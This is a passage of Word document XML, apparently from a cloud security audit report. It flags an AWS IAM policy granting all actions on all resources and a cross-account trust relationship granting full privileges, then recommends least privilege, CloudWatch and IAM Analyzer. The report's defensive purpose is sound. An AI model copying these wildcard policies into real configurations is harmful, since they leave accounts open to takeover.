        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>policy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>resources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>allowed):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="396" w:right="6100" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"2012-10-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>17"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="0" w:right="6100" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Statement"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="395" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="4517" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Effect"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="0" w:right="4517" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Action"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="0" w:right="4418" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"Resource"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"*"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}]}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Review the JSON trust relationship, which allows users from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>292595537002 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to assume this role:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>relationship</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>grants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>privileges):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1115" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Version"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"2012-10-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>17"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Statement"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1907" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="6029" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Effect"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Allow"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Principal"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"AWS"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"arn:aws:iam::292595537002:root"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Action"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="2303" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"sts:AssumeRole"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"sts:TagSession"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Condition"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to apply the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Principle of Least Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>125</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> to prevent users and automated tools from having excessive rights. For this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>purpose,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>advised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>consider using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>126</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>IAM Analyzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. These tools generate policies based on the access activity. Although such policies are usually not perfect, they can be a valuable starting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>point,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ought</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="24"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to be reviewed and improved iteratively. For cross-accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487617024">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="81" name="Graphic 81"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="81" name="Graphic 81"/>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2.814966pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15699456;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape66" coordorigin="1440,256" coordsize="2880,0" path="m1440,256l4320,256e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>125</w:t>
